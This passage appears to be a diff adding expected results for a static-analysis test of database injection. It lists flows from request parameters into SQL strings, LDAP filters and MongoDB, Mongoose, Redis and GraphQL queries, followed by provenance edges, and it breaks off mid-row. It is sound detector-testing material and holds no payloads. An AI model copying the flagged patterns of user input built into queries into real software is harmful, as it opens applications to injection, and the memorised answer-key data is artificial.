| query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:35:18:35:22 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | +| json-schema-validator.js:55:22:55:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:55:22:55:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | +| json-schema-validator.js:59:22:59:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:59:22:59:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | +| json-schema-validator.js:61:22:61:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:61:22:61:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | +| koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | koarouter.js:5:13:5:19 | version | koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | This query string depends on a $@. | koarouter.js:5:13:5:19 | version | user-provided value | +| ldap.js:28:30:28:34 | opts1 | ldap.js:20:21:20:27 | req.url | ldap.js:28:30:28:34 | opts1 | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | +| ldap.js:32:5:32:61 | { filte ... e}))` } | ldap.js:20:21:20:27 | req.url | ldap.js:32:5:32:61 | { filte ... e}))` } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | +| ldap.js:66:30:66:53 | { filte ... ilter } | ldap.js:20:21:20:27 | req.url | ldap.js:66:30:66:53 | { filte ... ilter } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | +| ldap.js:68:27:68:42 | `cn=${username}` | ldap.js:20:21:20:27 | req.url | ldap.js:68:27:68:42 | `cn=${username}` | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | +| marsdb-flow-to.js:13:17:13:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:13:17:13:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | +| marsdb.js:15:12:15:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:15:12:15:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | +| minimongo.js:17:12:17:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:17:12:17:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | +| mongodb.js:17:16:17:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:17:16:17:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | +| mongodb.js:30:18:30:45 | { title ... itle) } | mongodb.js:25:19:25:26 | req.body | mongodb.js:30:18:30:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:25:19:25:26 | req.body | user-provided value | +| mongodb.js:51:16:51:20 | query | mongodb.js:47:19:47:33 | req.query.title | mongodb.js:51:16:51:20 | query | This query object depends on a $@. | mongodb.js:47:19:47:33 | req.query.title | user-provided value | +| mongodb.js:61:12:61:16 | query | mongodb.js:57:16:57:30 | req.query.title | mongodb.js:61:12:61:16 | query | This query object depends on a $@. | mongodb.js:57:16:57:30 | req.query.title | user-provided value | +| mongodb.js:72:14:72:26 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:72:14:72:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:79:12:79:24 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:79:12:79:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:105:14:105:18 | query | mongodb.js:101:17:101:29 | queries.title | mongodb.js:105:14:105:18 | query | This query object depends on a $@. | mongodb.js:101:17:101:29 | queries.title | user-provided value | +| mongodb_bodySafe.js:28:16:28:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:28:16:28:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | +| mongoose.js:23:21:23:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:23:21:23:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:25:17:25:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:25:17:25:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:27:22:27:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:22:27:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:29:21:29:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:29:21:29:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:31:28:31:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:31:28:31:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:33:16:33:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:16:33:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:35:19:35:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:35:19:35:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:37:28:37:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:37:28:37:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:39:28:39:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:28:39:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:41:28:41:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:41:28:41:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:43:22:43:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:43:22:43:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:45:18:45:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:18:45:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:47:22:47:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:47:22:47:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:49:21:49:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:49:21:49:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:51:32:51:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:32:51:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:53:27:53:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:53:27:53:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:54:8:54:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:8:54:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:57:17:57:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:17:57:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:58:10:58:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:58:10:58:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:59:8:59:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:59:8:59:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:60:7:60:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:7:60:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:61:16:61:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:61:16:61:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:63:10:63:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:10:63:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:68:46:68:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:46:68:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:69:47:69:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:69:47:69:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:71:46:71:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:46:71:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:73:51:73:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:51:73:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:75:46:75:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:46:75:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:78:46:78:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:78:46:78:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:80:51:80:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:80:51:80:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:82:46:82:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:82:46:82:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:97:14:97:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:97:14:97:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:99:31:99:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:99:31:99:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:102:22:102:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:102:22:102:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:103:21:103:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:103:21:103:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:104:21:104:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:104:21:104:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:105:18:105:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:105:18:105:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:106:22:106:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:106:22:106:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:107:16:107:19 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:107:16:107:19 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:108:19:108:22 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:108:19:108:22 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:109:20:109:21 | id | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:109:20:109:21 | id | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:110:28:110:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:110:28:110:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:111:28:111:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:111:28:111:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:112:28:112:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:112:28:112:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:113:18:113:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:113:18:113:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:114:22:114:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:114:22:114:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:115:21:115:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:115:21:115:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:116:16:116:26 | { _id: id } | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:116:16:116:26 | { _id: id } | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:122:30:122:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:122:30:122:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongooseJsonParse.js:22:19:22:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:22:19:22:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | +| mongooseModelClient.js:11:16:11:24 | { id: v } | mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:11:16:11:24 | { id: v } | This query object depends on a $@. | mongooseModelClient.js:10:22:10:29 | req.body | user-provided value | +| mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | This query object depends on a $@. | mongooseModelClient.js:12:22:12:29 | req.body | user-provided value | +| mysql.js:15:18:15:65 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:15:18:15:65 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | +| mysql.js:19:26:19:73 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:19:26:19:73 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | +| pg-promise-types.ts:8:17:8:21 | taint | pg-promise-types.ts:7:17:7:28 | req.params.x | pg-promise-types.ts:8:17:8:21 | taint | This query string depends on a $@. | pg-promise-types.ts:7:17:7:28 | req.params.x | user-provided value | +| pg-promise.js:9:10:9:14 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:9:10:9:14 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:10:11:10:15 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:10:11:10:15 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:11:17:11:21 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:11:17:11:21 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:12:10:12:14 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:12:10:12:14 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:13:12:13:16 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:13:12:13:16 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:14:18:14:22 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:14:18:14:22 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:15:11:15:15 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:15:11:15:15 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:16:10:16:14 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:16:10:16:14 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:17:16:17:20 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:17:16:17:20 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:18:12:18:16 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:18:12:18:16 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:19:13:19:17 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:19:13:19:17 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:22:11:22:15 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:22:11:22:15 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:30:13:30:25 | req.params.id | pg-promise.js:30:13:30:25 | req.params.id | pg-promise.js:30:13:30:25 | req.params.id | This query string depends on a $@. | pg-promise.js:30:13:30:25 | req.params.id | user-provided value | +| pg-promise.js:34:13:34:25 | req.params.id | pg-promise.js:34:13:34:25 | req.params.id | pg-promise.js:34:13:34:25 | req.params.id | This query string depends on a $@. | pg-promise.js:34:13:34:25 | req.params.id | user-provided value | +| pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:39:7:39:19 | req.params.id | This query string depends on a $@. | pg-promise.js:39:7:39:19 | req.params.id | user-provided value | +| pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:40:7:40:21 | req.params.name | This query string depends on a $@. | pg-promise.js:40:7:40:21 | req.params.name | user-provided value | +| pg-promise.js:47:11:47:23 | req.params.id | pg-promise.js:47:11:47:23 | req.params.id | pg-promise.js:47:11:47:23 | req.params.id | This query string depends on a $@. | pg-promise.js:47:11:47:23 | req.params.id | user-provided value | +| pg-promise.js:54:11:54:23 | req.params.id | pg-promise.js:54:11:54:23 | req.params.id | pg-promise.js:54:11:54:23 | req.params.id | This query string depends on a $@. | pg-promise.js:54:11:54:23 | req.params.id | user-provided value | +| pg-promise.js:56:14:56:29 | req.params.title | pg-promise.js:56:14:56:29 | req.params.title | pg-promise.js:56:14:56:29 | req.params.title | This query string depends on a $@. | pg-promise.js:56:14:56:29 | req.params.title | user-provided value | +| pg-promise.js:60:20:60:24 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:60:20:60:24 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:63:23:63:27 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:63:23:63:27 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| pg-promise.js:64:16:64:20 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:64:16:64:20 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | +| redis.js:10:16:10:27 | req.body.key | redis.js:10:16:10:23 | req.body | redis.js:10:16:10:27 | req.body.key | This query object depends on a $@. | redis.js:10:16:10:23 | req.body | user-provided value | +| redis.js:18:16:18:18 | key | redis.js:12:15:12:22 | req.body | redis.js:18:16:18:18 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | +| redis.js:19:43:19:45 | key | redis.js:12:15:12:22 | req.body | redis.js:19:43:19:45 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | +| redis.js:25:14:25:16 | key | redis.js:12:15:12:22 | req.body | redis.js:25:14:25:16 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | +| redis.js:30:23:30:25 | key | redis.js:12:15:12:22 | req.body | redis.js:30:23:30:25 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | +| redis.js:32:28:32:30 | key | redis.js:12:15:12:22 | req.body | redis.js:32:28:32:30 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | +| redis.js:39:16:39:18 | key | redis.js:38:17:38:24 | req.body | redis.js:39:16:39:18 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | +| redis.js:43:27:43:29 | key | redis.js:38:17:38:24 | req.body | redis.js:43:27:43:29 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | +| redis.js:46:34:46:36 | key | redis.js:38:17:38:24 | req.body | redis.js:46:34:46:36 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | +| socketio.js:11:12:11:53 | `INSERT ... andle}` | socketio.js:10:25:10:30 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | This query string depends on a $@. | socketio.js:10:25:10:30 | handle | user-provided value | +| tst2.js:8:27:8:84 | "select ... d + "'" | tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:8:66:8:78 | req.params.id | user-provided value | +| tst3.js:9:14:9:19 | query1 | tst3.js:8:16:8:34 | req.params.category | tst3.js:9:14:9:19 | query1 | This query string depends on a $@. | tst3.js:8:16:8:34 | req.params.category | user-provided value | +| tst4.js:8:10:8:66 | 'SELECT ... d + '"' | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | This query string depends on a $@. | tst4.js:8:46:8:60 | $routeParams.id | user-provided value | +| tst.js:10:10:10:64 | 'SELECT ... d + '"' | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | This query string depends on a $@. | tst.js:10:46:10:58 | req.params.id | user-provided value | +edges +| graphql.js:8:11:8:28 | id | graphql.js:11:46:11:47 | id | provenance | | +| graphql.js:8:16:8:28 | req.params.id | graphql.js:8:11:8:28 | id | provenance | | +| graphql.js:11:46:11:47 | id | graphql.js:9:34:19:5 | `\\n ... }\\n ` | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:26:37:26:38 | id | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:29:39:29:40 | id | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:32:25:32:26 | id | provenance | | +| graphql.js:25:16:25:28 | req.params.id | graphql.js:25:11:25:28 | id | provenance | | +| graphql.js:26:37:26:38 | id | graphql.js:26:30:26:40 | `foo ${id}` | provenance | | +| graphql.js:29:39:29:40 | id | graphql.js:29:32:29:42 | `foo ${id}` | provenance | | +| graphql.js:32:25:32:26 | id | graphql.js:32:18:32:28 | `foo ${id}` | provenance | | +| graphql.js:38:11:38:28 | id | graphql.js:43:21:43:22 | id | provenance | | +| graphql.js:38:11:38:28 | id | graphql.js:47:51:47:52 | id | provenance | | +| graphql.js:38:16:38:28 | req.params.id | graphql.js:38:11:38:28 | id | provenance | | +| graphql.js:43:21:43:22 | id | graphql.js:43:14:43:24 | `foo ${id}` | provenance | | +| graphql.js:47:51:47:52 | id | graphql.js:47:44:47:54 | `foo ${id}` | provenance | | +| graphql.js:54:11:54:28 | id | graphql.js:55:46:55:47 | id | provenance | | +| graphql.js:54:11:54:28 | id | graphql.js:57:73:57:74 | id | provenance | | +| graphql.js:54:16:54:28 | req.params.id | graphql.js:54:11:54:28 | id | provenance | | +| graphql.js:55:46:55:47 | id | graphql.js:55:39:55:49 | `foo ${id}` | provenance | | +| graphql.js:57:73:57:74 | id | graphql.js:57:66:57:76 | `foo ${id}` | provenance | | +| graphql.js:73:9:73:25 | id | graphql.js:74:56:74:57 | id | provenance | | +| graphql.js:73:9:73:25 | id | graphql.js:86:13:86:14 | id | provenance | | +| graphql.js:73:14:73:25 | req.query.id | graphql.js:73:9:73:25 | id | provenance | | +| graphql.js:74:56:74:57 | id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | provenance | | +| graphql.js:86:13:86:14 | id | graphql.js:82:14:88:8 | `{\\n ... }` | provenance | | +| graphql.js:117:11:117:28 | id | graphql.js:118:45:118:46 | id | provenance | | +| graphql.js:117:16:117:28 | req.params.id | graphql.js:117:11:117:28 | id | provenance | | +| graphql.js:118:45:118:46 | id | graphql.js:118:38:118:48 | `foo ${id}` | provenance | | +| html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:14:18:14:23 | param1 | provenance | | +| html-sanitizer.js:14:5:14:24 | param1 | html-sanitizer.js:16:54:16:59 | param1 | provenance | | +| html-sanitizer.js:14:14:14:24 | xss(param1) | html-sanitizer.js:14:5:14:24 | param1 | provenance | | +| html-sanitizer.js:14:18:14:23 | param1 | html-sanitizer.js:14:14:14:24 | xss(param1) | provenance | Config | +| html-sanitizer.js:16:54:16:59 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | provenance | | +| json-schema-validator.js:25:15:25:48 | query | json-schema-validator.js:33:22:33:26 | query | provenance | | +| json-schema-validator.js:25:15:25:48 | query | json-schema-validator.js:35:18:35:22 | query | provenance | | +| json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | json-schema-validator.js:25:15:25:48 | query | provenance | | +| json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | provenance | Config | +| json-schema-validator.js:50:15:50:48 | query | json-schema-validator.js:55:22:55:26 | query | provenance | | +| json-schema-validator.js:50:15:50:48 | query | json-schema-validator.js:59:22:59:26 | query | provenance | | +| json-schema-validator.js:50:15:50:48 | query | json-schema-validator.js:61:22:61:26 | query | provenance | | +| json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | json-schema-validator.js:50:15:50:48 | query | provenance | | +| json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | provenance | Config | +| koarouter.js:5:11:5:33 | version | koarouter.js:14:38:14:44 | version | provenance | | +| koarouter.js:5:13:5:19 | version | koarouter.js:5:11:5:33 | version | provenance | | +| koarouter.js:14:9:14:18 | [post update] conditions [ArrayElement] | koarouter.js:17:52:17:61 | conditions [ArrayElement] | provenance | | +| koarouter.js:14:25:14:46 | `versio ... rsion}` | koarouter.js:14:9:14:18 | [post update] conditions [ArrayElement] | provenance | | +| koarouter.js:14:38:14:44 | version | koarouter.js:14:25:14:46 | `versio ... rsion}` | provenance | | +| koarouter.js:17:52:17:61 | conditions [ArrayElement] | koarouter.js:17:52:17:75 | conditi ... and ') | provenance | | +| koarouter.js:17:52:17:75 | conditi ... and ') | koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | provenance | | +| ldap.js:20:7:20:34 | q | ldap.js:22:18:22:18 | q | provenance | | +| ldap.js:20:11:20:34 | url.par ... , true) | ldap.js:20:7:20:34 | q | provenance | | +| ldap.js:20:21:20:27 | req.url | ldap.js:20:11:20:34 | url.par ... , true) | provenance | | +| ldap.js:22:7:22:33 | username | ldap.js:25:24:25:31 | username | provenance | | +| ldap.js:22:7:22:33 | username | ldap.js:25:46:25:53 | username | provenance | | +| ldap.js:22:7:22:33 | username | ldap.js:32:26:32:33 | username | provenance | | +| ldap.js:22:7:22:33 | username | ldap.js:32:48:32:55 | username | provenance | | +| ldap.js:22:7:22:33 | username | ldap.js:64:16:64:23 | username | provenance | | +| ldap.js:22:7:22:33 | username | ldap.js:64:38:64:45 | username | provenance | | +| ldap.js:22:7:22:33 | username | ldap.js:68:33:68:40 | username | provenance | | +| ldap.js:22:18:22:18 | q | ldap.js:22:7:22:33 | username | provenance | | +| ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | ldap.js:28:30:28:34 | opts1 | provenance | Config | +| ldap.js:25:24:25:31 | username | ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | provenance | | +| ldap.js:25:46:25:53 | username | ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | provenance | | +| ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | ldap.js:32:5:32:61 | { filte ... e}))` } | provenance | Config | +| ldap.js:32:26:32:33 | username | ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | provenance | | +| ldap.js:32:48:32:55 | username | ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | provenance | | +| ldap.js:63:9:65:3 | parsedFilter | ldap.js:66:40:66:51 | parsedFilter | provenance | | +| ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | ldap.js:63:9:65:3 | parsedFilter | provenance | | +| ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | provenance | Config | +| ldap.js:64:16:64:23 | username | ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | provenance | | +| ldap.js:64:38:64:45 | username | ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | provenance | | +| ldap.js:66:40:66:51 | parsedFilter | ldap.js:66:30:66:53 | { filte ... ilter } | provenance | Config | +| ldap.js:68:33:68:40 | username | ldap.js:68:27:68:42 | `cn=${username}` | provenance | | +| marsdb-flow-to.js:10:9:10:18 | query | marsdb-flow-to.js:13:17:13:21 | query | provenance | | +| marsdb-flow-to.js:10:17:10:18 | {} | 